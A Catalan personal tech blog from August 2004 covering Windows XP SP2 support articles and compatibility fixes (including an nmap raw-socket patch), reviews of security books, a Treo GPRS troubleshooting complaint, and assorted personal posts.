Troubleshooting Windows Firewall settings in Windows XP Service Pack 2
|
| How To Articles |
| 883255 |
How To configure Internet Explorer automatic download prompts on your Windows XP Service Pack 2-based computer |
| 883256 |
How To manage Internet Explorer add-ons in Windows XP Service Pack 2 |
| 878451 |
How To turn on the Remote Desktop Sharing feature of Windows NetMeeting in Windows XP Service Pack 2 |
| 883259 |
How To install and configure Bluetooth devices in Windows XP Service Pack 2 |
| 842844 |
How To install Windows XP Service Pack 2 by using Systems Management Server |
| 875355 |
How To use the Automatic Recovery feature to recover your computer if the Windows XP Service Pack 2 Setup program is not completed successfully |
| 870903 |
How To remotely administer a printer through a network share when you use Windows XP Service Pack 2 in a workgroup environment
|
| Application Compatibility Articles |
| 870890 |
You cannot modify Windows Firewall settings for an AOL dial-up network connection by using Network Connections in Control Panel in Windows XP Service Pack 2 |
| 873173 |
The Application Center 2000 client snap-in does not display correct health monitor information in Windows XP Service Pack 2 |
| 873185 |
You may not be able to open a project when you try to connect to a remote Windows XP Service Pack 2-based computer by using the AutoCAD FTP service |
| 873164 |
You cannot use Veritas Backup Exec to back up a remote Windows XP Service Pack 2-based computer |
| 870904 |
ARCserveIT 6.61 does not successfully back up files that are in the %Windir%SoftwareDistribution folder of your Windows XP SP2-based computer |
| 870901 |
"Installation failed: Access is denied" error message when you try to perform a remote installation of Computer Associates eTrust Antivirus 7.0 client software on a computer that is running Windows XP Service Pack 2 |
| 843020 |
You cannot play licensed media content in Windows Media Player after you remove Windows XP Service Pack 2 |
| 870908 |
Command AntiVirus version 4.62.4 causes an error message on a blue screen in Windows XP Service Pack 2 |
| 873165 |
You cannot use Computer Associates BrightStor ARCServe Backup 9.0 Manager to back up a Windows XP Service Pack 2-based computer from a remote computer |
| 842701 |
You may not be able to add Manage Add-ons columns by using only the keyboard in Windows XP Service Pack 2 |
| 878472 |
You receive the "Control ID not found" error message when you try to install Windows XP Service Pack 2 |
| 870881 |
You receive an error message when you try to start Money on a Windows XP Service Pack 2-based computer |
| 878478 |
The Gravis GamePad Pro device is not recognized when you install it on a Windows XP-based computer |
| 870905 |
McAfee Internet Security version 4.0 quits unexpectedly during installation in Windows XP Service Pack 2 |
| 870906 |
McAfee Virusscan Professional version 6.0 quits unexpectedly after you install it on a Windows XP Service Pack 2-based computer |
| 883606 |
Messages in Microsoft Outlook are not sent immediately in Windows XP Service Pack 2 |
| 870907 |
NetZero closes unexpectedly when you start it in Windows XP SP2 |
| 870902 |
You cannot back up the %windir%SoftwareDistribution folder by using the NovaStor NovaNet-WEB backup program on Windows XP Service Pack 2 |
| 873176 |
You cannot install Paint Shop Pro 8 on a Windows XP Service Pack 2-based computer |
| 873179 |
The JumpStart Preschool - 1st Grade Learning Playground Demo screen does not appear correctly on a Windows XP Service Pack 2-based computer |
| 870883 |
"Cannot load Word for Windows 6.0 files" error message when you try to open the "What's new" file in Quicken on a Windows XP-based computer |
| 870897 |
SonicWALL Complete Anti-Virus program does not work after you install Windows XP Service Pack 2 |
| 873152 |
You occasionally receive a "STOP: 0x000000D1" error message when your Windows XP Service Pack 2 computer resumes from standby |
| 870900 |
SOURCENEXT VirusSecurity2004 real-time monitor does not work correctly on a Windows XP Service Pack 2-based computer |
| 873162 |
You cannot use Legato NetWorker to back up a remote computer that is running Windows XP Service Pack 2 |
| 843019 |
You cannot start Windows Messenger after you install Windows XP Service Pack 2 |
| 883603 |
Windows Movie Maker 2.1 is installed on your computer when you install Windows XP SP2
|
| Bluetooth Issues |
| 870701 |
You cannot add a Bluetooth printer on a computer that is running Windows XP Service Pack 2 |
| 840635 |
Cannot install a Bluetooth device after you install Windows XP Service Pack 2 |
| 841803 |
List of Bluetooth radio drivers that are included in Windows XP SP2 |
| 873154 |
A Bluetooth keyboard or mouse does not work when you start Windows XP Service Pack 2 |
| 883258 |
How to troubleshoot Bluetooth detection and connectivity problems in Windows XP Service Pack 2 |
| 870895 |
You receive a "STOP: 0x000000D5" fatal system error message after you update to Windows XP Service Pack 2 on your Toshiba portable computer |
| 841799 |
Bluetooth device installation may not work without any notification
|
| Driver Issues |
| 873161 |
After you install Windows XP Service Pack 2, your computer restarts continuously |
| 883775 |
Device drivers known to cause instability in Windows XP Service Pack 2 |
| 873166 |
Your computer may unexpectedly stop responding when you try to install modem drivers on a Windows XP Service Pack 2-based computer |
| 873171 |
Roll Back Driver feature in Device Manager does not work after you update a device driver to the Windows XP Service Pack (SP2) version of the device driver |
| 870892 |
Rollback of the driver in a multi-device scenario results in mismatched Driver and miniport |
| 870891 |
Third-party device drivers are not restored after you restore the System State data from backup in Windows XP |
| 870896 |
You receive a "STOP: 0x000000D5" error message when you close an IP Phone connection on a Windows XP Service Pack 2-based Toshiba computer |
| 873169 |
When you install Windows XP Service Pack 2, the USB 2.0 drivers do not appear to update
|
| Setup Issues |
| 883609 |
"This Service Pack requires the machine to be on AC Power before setup starts" error message when you install Windows XP Service Pack 2 |
| 870898 |
You receive a "Windows XP Setup is incompatible with this version of Windows" error message when you install Windows XP Service Pack 2 on a Hewlett-Packard computer |
| 883356 |
You receive a "Windows was unable to install the modem" error message when you try to install a modem on your Windows XP Service Pack 2-based computer |
| 878454 |
How to help protect your computer if you decide to remove Windows XP Service Pack 2 |
| 878459 |
The Windows Explorer status bar is not visible after you install Windows XP Service Pack 2 |
| 883791 |
Explorer.exe repeatedly quits unexpectedly in Windows XP
|
| Miscellaneous Issues |
| 843021 |
Programs or services that use the Alerter service or the Messenger service do not work as expected after you install Windows XP Service Pack 2 |
| 873160 |
You may receive a 7391 error message in SQLOLEDB when you run a distributed transaction against a linked server after you install Microsoft Windows XP Service Pack 2 |
| 875362 |
The Computer Browser service does not start and event ID 7024 is logged when you restart your Windows XP Service Pack 2-based computer |
| 870894 |
You receive a "Delayed Write Failed" error message in Windows XP Service Pack 2 |
| 883257 |
Description of plain text mode in Outlook Express in Windows XP Service Pack 2 |
| 878471 |
Some DVD movies are blocked although the DVD movie rating is allowed on a Windows XP Media Center Edition Service Pack 2-based computer |
| 883608 |
You receive an error message when you add a reference to a COM object in Visual Studio .NET after you install Windows XP Service Pack 2 |
| 840633 |
Event ID 612 appears in the security log every time that you restart Windows XP Service Pack 2 |
| 883613 |
Outlook Express automatically downloads external content when you reply to a message or forward a message on a Windows XP Service Pack 2-based computer |
| 873158 |
The Help and Support Center does not run when the Data Execution Protection feature is turned on in Windows XP Service Pack 2 |
| 883605 |
New features of the Scheduled Tasks Control Panel item that are included in Windows XP Service Pack 2 |
| 870703 |
Known issues with the client administrative tools in Windows XP SP2 |
| 878461 |
Pictures do not appear as expected, or you receive an error message when you open an HTML file on a Windows XP Service Pack 2-based computer |
| 878468 |
You receive an "An error occurred while sending a message to <ComputerName>" error message when you run the net send command to send a message to a Windows XP Service Pack 2-based computer |
| 873153 |
Your screen reader software may not function if you install Windows XP Service Pack 2 by using OOBE |
| 870704 |
Peer-to-peer networking programs do not work as expected in Windows XP Service Pack 1 |
| 841802 |
Phone Dialer calls are immediately disconnected in Windows XP |
| 843015 |
Pop-up windows appear with Pop-up Blocker turned on in Windows XP Service Pack 2 |
| 870705 |
Remote Storage Service recall notifications will no longer operate in XPSP2 |
| 841804 |
RIP Listener does not update the route table with new route information |
| 883261 |
You are prompted to accept or reject certain Windows Messenger files in Windows XP Service Pack 2 |
| 883355 |
You cannot use an MP3 or WMA file as the background sound for an e-mail message in Outlook Express |
| 878467 |
Your Windows XP-based computer does not resume from standby when you move your USB mouse or press a key on your USB keyboard |
| 870893 |
USB device does not function after connecting device to Windows XP Service Pack 2-based computer |
| 883607 |
Web server functionality may not work correctly after you install Windows XP Service Pack 2 |
| 883611 |
You have to specify certain Group Policy settings before you can remotely administer Resultant Set of Policy (RSoP) or remotely edit local Group Policy objects in Windows XP Service Pack 2 |
| 840634 |
You receive an "Access denied" or "The network path was not found" error message when you try to remotely manage a computer that is running Windows XP Service Pack 2 |
|
22:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Via Treocentral] el columnista de tecnologia al The Wall Street Journal, Walt Mossberg, es declara un fervent usuari del Treo 600
Q. I am a longtime Palm user, but my company is going with the BlackBerry system, which I don't feel is as good as an organizer. I am inclined to stick with the Palm OS, but our IT department is telling me that the Treo 600 has very poor battery life. Do you agree?
A. No. I carry a Treo 600 every day, and download hundreds of e-mails to it all day, at 15-minute intervals. I compose and send at least a dozen e-mails a day on it as well. I also use the Treo as my everyday cellphone, and do occasional Web browsing on it. I have never once run out of battery power before getting home to recharge it. Not even close.
Your IT folks may be ignorant about the Treo 600. Another possibility is that they are confusing the current 600 model with the earlier 300 model, which had a weaker battery life that caused problems for some heavy users. Or, they may have an agenda. The BlackBerry's maker focuses heavily on wooing IT departments and supplying server software, so it is more popular with corporate IT folks than is the Treo.
Jo també faig un ús intensiu del Treo i, tot i que la bateria sovint és suficient... si faig servir el telèfon mòbil durant una bona estona, el nivell d'energia baixa força i en alguna ocasió he arribat al nivell vermell que indica menys d'un 5% de bateria. Han estat ocasions excepcionals, però.
|
21:21 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
De les poques fotos que he tingut l'oportunitat de fer a Andorra... la vista des de la finestra de l'hotel:
Vista en direcció a Escaldes-Engordany |
Vista en direcció a Andorra la Vella,
amb el Valira en primer pla |
|
19:03 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Ara fa mig any vaig comentar el primer volum d'aquesta sèrie, el «Stealing the Network. How to Own the Box».
Si en el primer volum trobàvem una col·lecció de relats sobre accions individuals de hackers accedint a xarxes de bancs i empreses, en aquesta ocasió ens trobem immersos en històries de grups de hackers (o hackers individuals que no saben pas que formen part d'un grup, que també n'hi ha).
El que destaca d'aquests relats és, tal com ja passava amb el primer volum, el realisme de les històries. I no n'hi ha per menys, ja que els relats els escriuen autèntics hackers (com Fyodor, l'autor de l'NMap) i professionals de la seguretat informàtica que saben de que parlen. No són pas històries on el protagonista es troba davant una pantalla i al tercer intent ja ha descobert la contrasenya i pot accedir a totes les dades... Són històries de ficció, però escrites amb realisme. Personalment vull destacar el relat que forma el capítol 9: «Automatic Terror Machine», una història ambientada a l'Àfrica.
Tal com ja vaig indicar amb el primer llibre, ens trobem amb una lectura apassionant per a qualsevol persona interessada en el món de la seguretat informàtica, doncs no li costarà identificar-s'hi amb els protagonistes de les històries.
Títol: Stealing the Network. How to Own a Continent
Autors: 131ah, Russ Rogers, Jay Beale, Joe Grand, Fyodor, FX, Paul Creig, Timothy Mullen i Tom Parker
Editorial: Syngress
1a edició (Maig 2004)
402 pàgines
ISBN: 1-931836.05-1
El llibre a Amazon.com i a Amazon.co.uk.
|
16:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
CreateCD, una eina per Windows XP i 2003 que permet crear CD-ROM des de la línia d'ordres.
|
13:16 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Fa pocs dies que s'ha publicat nova versió d'Ethereal, la 0.10.6. Ethereal és un complet conjunt d'eines per a la identificació de problemes a les xarxes, l'anàlisi de tràfic i el desenvolupament de nous protocols de comunicacions. Dins d'Ethereal trobarem totes les prestacions que esperem en un analitzador de protocols.
Un altra novetat relacionada amb Ethereal és la publicació d'una actualització de la Guia d'usuari (PDF i HTML). És un complet manual d'usuari, de 200 pàgines on s'explica des de la compilació i instal·lació d'Ethereal, com utilitzar-lo per capturar dades i la realització d'anàlisis.
|
10:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 20 / agost / 2004 |
Malgrat el que es va anunciar en el seu dia, Microsoft ha decidit endarrerir la distribució a través del servei Windows Update:
Microsoft has revised its plans to deliver Windows XP SP2 through the Automatic Updates (AU) delivery mechanism in Windows to give customers more time to plan the rollout of this critical update or temporarily block the download of Windows XP SP2 to those machines using AU.
El calendari actualitzat és:
- 16 d'agost: distribució a través del servei d'actualització de software.
- 18 d'agost: distribució a través de Windows Update, únicament pels usuaris de Windows XP Home Edition
- 25 d'agost: distribució general per tots les usuaris de Windows XP, inclosa l'edició Professional.
A hores d'ara, Microsoft ha documentat l'existència d'una cinquantena de programes que tenen problemes un cop s'ha instal·lat el XP2.
Com ja vaig indicar, hi ha disponible una eina de Microsoft que permet bloquejar l'actualització dels usuaris d'una xarxa a través de Windows Update, per d'aquesta forma donar més temps per a la planificació dels canvis necessaris.
|
23:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
El Ponemon Institute va realitzar una enquesta durant el darrer BlackHat, Defcon i d'altres conferències per tal de conèixer quina era l'opinió de la comunitat de seguretat, comparant-la amb la visió del públic en general, sobre els sistemes de vot electrònic.
Les conclusions d'aquesta enquesta posen els pèls de punta. Vegeu, per exemple, l'article publicat a ComputerWorld: Public, security experts' e-voting views differ sharply
Security experts are substantially more skeptical about e-voting than the public, but their greatest worry is system and programming errors, not malicious hacker attacks, according to a survey released this week by the Ponemon Institute.
|
22:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ja he tornat d'Andorra. No he tingut massa oportunitat de fer turisme ni de comprar res... ja que he tingut jornades de molta feina. De totes formes, no he volgut passar l'oportunitat de garantir-me un any de CD-R i DVD-R sense pagar el cànon de l'SGAE: dues bobines de 100 CD-R (a 29 cèntims el CD-R) i un parell de bobines de 25 DVD-R (a 0,96 euros el DVD). No se si són més barats o més cars que a Barcelona... però la única idea de no pagar a l'SGAE ja em fa feliç.
|
19:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 18 / agost / 2004 |
 Acaba de publicar-se la nova versió 3.9 d'OpenSSH, la versió lliure de la família de protocols SSH pensats per oferir una alternativa segura als serveis telnet, rlogin, ftp i similars, ja que tot el tràfic que circula per la xarxa ho fa de forma xifrada i implementa sistemes forts per a l'autenticació de cada un dels extrems de la comunicació. D'aquesta forma s'eviten possibles atacs d'intercepció, suplantació o segrest de les sessions.
Aquesta és una versió de manteniment que soluciona diversos problemes funcionals de les versions anteriors. Addicionalment, la versió portable torna a oferir la possibilitat de l'autenticació amb contrasenyes via PAM (un mètode menys flexible que l'autenticació directa per usuari i contrasenya de forma directa).
|
22:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 17 / agost / 2004 |
[NYPost] Cyber Fears on FED's Web Plan. La Reserva Federal dels Estats Units (l'equivalent al Banc Central Europeu) començarà a utilitzar Internet per a realitzar operacions financeres entre bancs.
With little fanfare, the Federal Reserve will begin transferring the nation's money supply over an Internet-based system this month — a move critics say could open the U.S.'s banking system to cyber threats.
(...)
"Of course, we will not discuss the specifics of our security measures for obvious reasons. We feel confident that this system adheres to the highest standards of security. Without disclosing the specifics, it is important to note that our security controls include authentication, encryption, firewalls, intrusion detection and Federal Reserve conducted reviews."
|
22:41 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 16 / agost / 2004 |
No puc connectar el meu Treo 600 a la xarxa GPRS de STA, la companyia telefònica d'Andorra.
Explico la situació. Disposo d'una línia d'empresa de Movistar Empresas, aquella empresa del monopoli de Telefonica on els usuaris no tenim cap importància. Aquesta setmana estic a Andorra, on accedeixo per roaming a la xarxa de STA-Mobiland (la única xarxa GSM disponible). Segons el telèfon, hi ha connexió GPRS disponible, però no puc connectar.
Quan intento realitzar la connexió no arriba a establir-la. L'error és «Error: GPRS connection not available. Check your settings in Network Preferences and/or try again later (0x7143)». Mirant el registre de la connexió veig això: LCP->CfgReq
LCP<-CfgReq
LCP->CfgRej
LCP<-CfgAck
LCP<-CfgReq
LCP->CfgAck
LCP Up
PAP->CfgReq
IPCP->CfgReq
LCP<-TrmReq
LCP->TrmAck
LCP Timeout
Not connected
Truco al servei de desatenció de Movistar i evidentment no entenen res. Em diuen que haig de baixar-me un programa anomenat «Kit de Conexión GPRS para PDA- Palm» que no em serveix per absolutament res... es tracta d'un programa per connectar una Palm via infrarojos amb un telèfon GPRS.
Després de diverses trucades, dient cinc o sis vegades per trucada el meu número de telèfon i fart d'escoltar la música de l'anunci de GPRS i els «lamentamos la demora» cada vegada que em tornen a preguntar alguna cosa que ja m'han preguntat, em diuen que no es culpa de Telefònica.
Em passen amb el servei tècnic «especialitzat» (tant especialitzat que no té ni idea de que és un SmartPhone i em diu que no són possibles els telèfons i PDA integrats). Em demanen que truqui des d'un telèfon fix per poder fer proves al telèfon mòbil.
Dues o tres trucades més per tal que em donin un número al que pugui trucar des d'un telèfon fixe; em donen dos números (+0034609 i +00341485 que no funcionen; al final em faciliten un que sí funciona, el +0034609100609).
Truco; em tenen gairebé mitja hora penjat mentre estan comprovant la línia i determinant si hi ha algun problema. Em demanen vàries vegades el model de telèfon. Em fan apagar i tornar a connectar la línia vàries vegades. Res, no connecto.
Més espera. Em diuen que el Treo no està homologat per Telefònica i per tant només em poden donar les dades genèriques de connexió. Em donen exactament les mateixes dades que ja tinc (usuari MOVISTAR, contrasenya MOVISTAR). Li dic que aquesta informació no serveix per a res.
Una nova espera. Ara em surt dient que com el meu telèfon no està homologat, per a ells no hi ha cap problema. És el meu problema i que em foti fulles.
Amb això més de mitja hora de trucada internacional seguida i vàries trucades més curtes al servei «de desatenció al client».
Què hem fet per merèixer un servei tan dolent com aquest? Tenen sort que la línia telefònica me la dóna l'empresa; si jo fos el client ja hauria llençat la targeta SIM de Telefónica a les escombraries.
A més, els serveis de desatenció al client sempre et fan les mateixes preguntes. A les últimes trucades ja començava dient: «Hola estic a Andorra, intento connectar a GPRS i no puc; sí, el telèfon m'indica l'existència de senyal telefònic i la disponibilitat de GPRS; el servei de GPRS està habilitat i el faig servir amb normalitat mentre estic a Barcelona; no, no he pogut connectar en cap moment; sí, si puc fer trucades i enviar SMS. El meu número és el xxx xxx xxx i aquesta és la vuitena trucada que faig».
|
21:51 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Tres eines de Microsoft que ajuden en la monitorització del rendiment dels equips Windows amb el Performance Monitor inclòs de forma estàndard al sistema operatiu. Són especialment útils quan es canvien paràmetres com el temps.
- Logman.exe, permet gestionar el registre de rendiment de sistemes remots des d'un punt centralitzat.
- Relog.exe, permet crear nous registres de rendiment amb nous valors (període de temps, tipus de fitxer de registre...).
- Typeperf.exe, per obtenir les dades de rendiment des de la línia d'ordres.
|
21:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Hi ha una campanya per aconseguir que Google obri la versió andorrana del cercador.
|
00:24 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 15 / agost / 2004 |
Demà torno a marxar cap a Andorra la Vella, on m'estaré fins divendres... amb una trista connexió telefònica a preu d'or (9 euros l'hora) a través de la companyia telefònica parapública (com l'anomenen allà), la STA. A més tampoc em funciona l'accés per GPRS: no estableix la connexió.
 Ara estic planxant tota la roba... no estic acostumat a planxar tant de cop; habitualment ho faig «on demand»: només planxo el que m'haig de posar aquell mateix dia.
El problema no és tant planxar (encara que amb aquesta calor no en tens masses ganes), sinó que demà a la tarda, quan obri la maleta veure que les camises estan totalment rebregades. Menys mal que el truc d'omplir la banyera amb aigua calenta i deixar la camisa estesa tota la nit, amb el bany ple de vapor, fa miracles...
|
22:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Netcraft] Interview with Bruce Schneier, Counterpane Internet Security
As a cryptographic consultant, I did a lot of work analyzing operating systems. Invariably I would break them, but almost never would I break the mathematical cryptography. I eventually realized that cryptography is the strongest part of a very weak system, and that the system aspects around the cryptography - the software, the operating system, the network, the user interface, etc. - are much more important.
|
22:06 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 «La Pell Freda» és un original conte sobre un irlandès que fuig (com sovint fan els irlandesos) d'un passat i s'amaga en una remota illa del nord de l'Atlàntic per fer-se càrrec d'una estació meteorològica. A l'illa només hi viu un enigmàtic personatge, Batís Caffó, que està al càrrec d'un atrotinat far.
Fins aquí sembla la típica història de fugida d'un passat tèrbol... fins que arriba la primera nit a l'illa. Una munió d'éssers enigmàtics, uns éssers amfibis que llencen un ferotge atac.
El responsable del far ho sabia i no va fer res per avisar al protagonista del risc que suposava passar la nit en una atrotinada cabana. A ell només l'interessa accedir a les municions per d'aquesta forma poder sobreviure més nits.
Al far a més hi viu una femella de l'espècie amfibia («la de pell freda») que cada nit llença els ferotges atacs. Aquesta femella és una mena de joguina sexual d'en Batís Caffó. El segrest d'aquesta esclava sexual acaba amb el trasllat de l'oficial irlandès, que es va a viure al far, l'únic edifici prou sòlid per resistir l'atac diari dels monstres.
La novel·la comença a llegir-se d'una forma molt lleugera... però després té una part on es fa certament pessada. Però paga la pena resistir i passar la part central, ja que el desenllaç es un viu reflex del comportament de les persones davant les dificultats.
Títol: La pell freda
Autor: Albert Sánchez Piñol
Edicions La Campana. Col·leció Tot de Ficció, número 28
307 pàgines
ISBN 84-95616-25-4
|
21:02 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 La primera edició d'aquest llibre, editada ara fa tres anys, va ser un dels primers intents en donar una visió de com pensaven els atacants de sistemes informàtics.
El projecte Honeypot, sobre el que es basava el llibre, era una experiència totalment innovadora: capturar tota la informació d'un atac per tal de conèixer la persona que hi ha al darrera. No interessa tant conèixer les eines sinó les persones.
Enguany s'ha publicat la segona edició de Know Your Enemy, el llibre del projecte Honeypot. És una edició notablement ampliada; de fet, és totalment nova. El format, no obstant, és bàsicament el mateix (quan quelcom funciona no cal modificar-ho).
La primera part, formada per vuit capítols, es presenten els honeypot i les honeynet (xarxes de honeypots). Com capturar la informació, quina mena d'informació faciliten, les diverses tecnologies existents, xarxes de honeypots distribuïdes... En aquesta primera part es presenta el concepte i la tecnologia que permet recollir la informació.
La segona part, formada per sis capítols, s'explica com analitzar la informació recollida per un honeypot o una honeynet, incloent-hi la realització d'anàlisis forenses de sistemes compromesos.
La tercera part, de quatre capítols, agafa tot allò que hem extret de les anàlisis i com això ens permet conèixer les amenaces de seguretat i com els atacants s'aprofiten de les vulnerabilitats per a realitzar atacs. Per fer-ho, s'analitzen les amenaces habituals i com aquestes han estat utilitzades per atacar diversos honeypots.
Un últim capítol tracta sobre el futur de les tecnologies de honeypots i el projecte.
El llibre inclou un CD-ROM amb totes les eines, materials i codi font, així com les dades capturades que són analitzades durant el llibre.
En definitiva, un autèntic llibre de referència com ja ho va ser la primera versió. És una publicació de lectura gairebé obligada per tots els professionals de la seguretat informàtica.
La web del llibre, amb material actualitzat és http://www.honeynet.org/book/.
Títol: Know Your Enemy. Learning About Security Threats
Autor: The Honeynet Project
2a edició (Maig 2004)
768 pàgines
ISBN: 0-321-16646-9
El llibre a Amazon.com i a Amazon.co.uk.
|
16:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Com comentava divendres, els canvis introduïts al Service Pack 2 de Windows XP impedeixen l'ús d'eines com nmap que envien paquets TC/IP especialment formatejats.
Sobre aquest tema, hi ha un interessant debat. D'una part tenim la gent que s'ha enfadat:
En l'altra costat tenim a Michael Howard que ho explica a: A little more info on raw sockets and Windows XP SP2
There's been a little confusion about raw sockets and Windows XP SP2. Hopefully, this little entry from the "Changes in functionality..." doc (see my last blog entry for an URL to the doc) should explain things a little better:
A very small number of Windows applications make use of raw IP sockets, which provide an industry-standard way for applications to create TCP/IP packets with fewer integrity and security checks by the TCP/IP stack. The Windows implementation of TCP/IP still supports receiving traffic on raw IP sockets. However, the ability to send traffic over raw sockets has been restricted in two ways:
- TCP data cannot be sent over raw sockets.
- UDP datagrams with invalid source addresses cannot be sent over raw sockets. The IP source address for any outgoing UDP datagram must exist on a network interface or the datagram is dropped.
La solució: el pegat que proposa Dana Epp que permet tornar a utilitzar l'NMAP amb el SP2. Es tracta d'eliminar el suport als raw sockets:--- winip.c 2004-08-12 10:18:46.000000000 -0700
+++ winip.c 2004-08-12 10:19:08.000000000 -0700
@@ -379,6 +379,9 @@
rawsock_avail = 0;
}
+ winbug = 1;
+ rawsock_avail = 0;
+
if(pcap_avail)
{
if(wo.trace) printf("***WinIP*** reading winpcap
interface listn");
|
15:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[John C. Dvorak] Top 10 Most Important Software Programs, els 10 programes més importants segons el columnista de PC Magazine: Visicalc, WordStar, Apache, Mosaic, Mac OS, Photoshop, dBASE II, Pagemaker, Sendmail i Microsoft BASIC. En Dave Winer també dóna la seva llista, molt centrada en el món Macintosh.
Jo de la llista de Dvorak em quedo amb Visicalc, WordStar, Apache, Mosaic i Sendmail. També hi afegiria el Linux, l'OS/2, el Turbo Pascal i algun altre que ara mateix no se m'acut.
|
13:12 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
- Managing Windows XP Service Pack 2 Features Using Group Policy (13 d'agost), sobre la utilització, desplegament i configuració dels nous paràmetres de polítiques de grup disponibles al SP2.
- Group Policy Settings Reference for Windows XP Professional Service Pack 2 Release Candidate 2 (13 d'agost), full de càlcul on es documenten el paràmetres de polítiques de grup inclosos als fitxers .ADM que es distribueixen amb el Service Pack 2 (Release Candidate 2).
- Deploying Windows Firewall Settings for Microsoft Windows XP with Service Pack 2 (12 d'agost), com desplegar el tallafocs de Windows XP dins d'un entorn gestionat.
- Changes to Functionality in Microsoft Windows XP Service Pack 2 (9 d'agost), es centra en l'impacte que té pels programadors les noves funcionalitats del SP2, incloent exemples i detalls que demostren els principals canvis.
- Windows XP Service Pack 2 Support Tools (9 d'agost), col·lecció d'eines per a la identificació i diagnosi de problemes.
- Windows XP SP2 Deployment Tools for Advanced Users (9 d'agost), col·lecció d'eines per facilitar la instal·lació del SP2 en diversos ordinadors.
- Troubleshooting Windows Firewall in Microsoft Windows XP Service Pack 2 (3 d'agost), explica el funcionament del tallafocs de Windows XP i els problemes habituals que es poden presentar. Inclou una col·lecció d'eines per ajudar en la resolució dels problemes provocats pel tallafocs.
- IEEE 802.11 Wireless LAN Security with Microsoft Windows XP (3 d'agost), documenta l'accés a les xarxes sense fils i els diversos mètodes d'autenticació i seguretat disponibles a Windows XP amb Service Pack 2.
|
13:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Infosec Writers] I Know Something You Don't Know (Email Secrets)
This paper provides an overview about an unchecked feature of the SMTP protocol, called 'Message-ID:'; unfortunately, this little feature may be required, thus making its removal difficult. Exploits may include: text-based steganography (I currently have a proof-of-concept process, although kludgy, *does* work) to hidden activation or deactivation codes of malicious or hidden code within any MIME-encapsulated header
|
11:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Durant aquesta passada setmana Microsoft ha publicat el butlletí mensual de seguretat. Aquest mes només n'ha publicat un, referent a una vulnerabilitat a l'OWA (Outlook Web Access) de l'Exchange 5.5. La vulnerabilitat pot ser utilitzada en atacs del tipus XSS (Cross-Site Scripting) i en atacs de suplantació
|
00:41 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 14 / agost / 2004 |
La fotografia està una mica super-exposada, però podeu veure un dels monuments més curiosos de Terrassa: l'escala de la xemeneia de la Bòbila Almirall que, des de l'any 1991 figura al llibre Guinness dels Records com l'escala de cargol més llarga del món.
|
22:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] Wiretapping the Web Easier Than Ever. La tendència de les últimes decisions de la FCC (l'organisme regulador de les comunicacions als Estats Units) és la d'afavorir la possibilitat d'intercepció de les comunicacions electròniques per part del govern
|
21:31 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La revista «Novática» de l'ATI dedica el seu número de maig-juny d'enguany (acabat de publicar) a la signatura electrònica i la identitat digital. El contingut d'aquesta revista està disponible en anglès (PDF d'alta resolució -3,7 MB- i baixa resolució -1,5 MB-). La web de la versió en castellà (horrible, per cert) no està encara actualitzada i no inclou cap referència a aquest número.
|
19:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Codi JavaScript per detectar si el navegador és la versió de l'Internet Explorer inclòs al Service Pack 2 (tret de Fine-Tune Your Web Site for Windows XP Service Pack 2) var g_fIsSP2 = false;
function browserVersion()
{
g_fIsSP2 = (
window.navigator.userAgent.indexOf("SV1") != -1);
if (g_fIsSP2)
{
// Internet Explorer de SP2.
}
else
{
// No és l'Internet Explorer de SP2.
}
}
L'User Agent de l'Internet Explorer del SP2 és una cosa per l'estil: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322)
Encara que com ja he indicat en un altre post, és força fàcil canviar l'User Agent.
|
16:15 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Avui he rebut l'exemple de correu brossa més al·lucinant que recordo: un argentí que es ven una vaca... si, de les que fan muuuuuuuuuu!
|
14:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Aquest és segurament el millor llibre sobre seguretat de les xarxes sense fils que hi ha actualment disponible al mercat.
Inclou la combinació justa de teoria, eines i tècniques per a conèixer i treballar la seguretat de les connexions sense fils. És curiós (i destacable) que els autors s'hagin limitat a tractar dels temes sobre els quals saben parlar i no tenen por a donar cites i referències externes a d'altres llibres. A més el llibre assumeix que els lectors són persones amb suficients coneixements de TCP/IP i administració de xarxes de forma que no cal perdre el temps explicant conceptes bàsics.
Un altre aspecte a destacar és que el llibre està al dia: parla d'eines i tècniques totalment noves (algunes de les eines fins i tot no estaven publicades en el moment de publicar el llibre). També trobarem consells per tal d'escollir el hardware WiFi més adient per a les instal·lacions on la seguretat sigui un aspecte fonamental així com aquell hardware que hauran d'utilitzar els responsables d'analitzar la seguretat.
Al llibre hi trobarem capítols sobre les tècniques de valoració, identificació i penetració de xarxes sense fils aprofitant les seves vulnerabilitats; com utilitzar eines de codi obert (FreeRADIUS, open1x, OpenLDAP) com infraestructura d'autenticació.
En definitiva, el llibre més recomanable per tothom interessat en estar al dia de les noves tècniques de seguretat de les xarxes sense fils.
Ah... a més el llibre manté una interessant web: http://www.wi-foo.com/.
Titol: Wi-Foo: The Secrets of Wireless Hacking
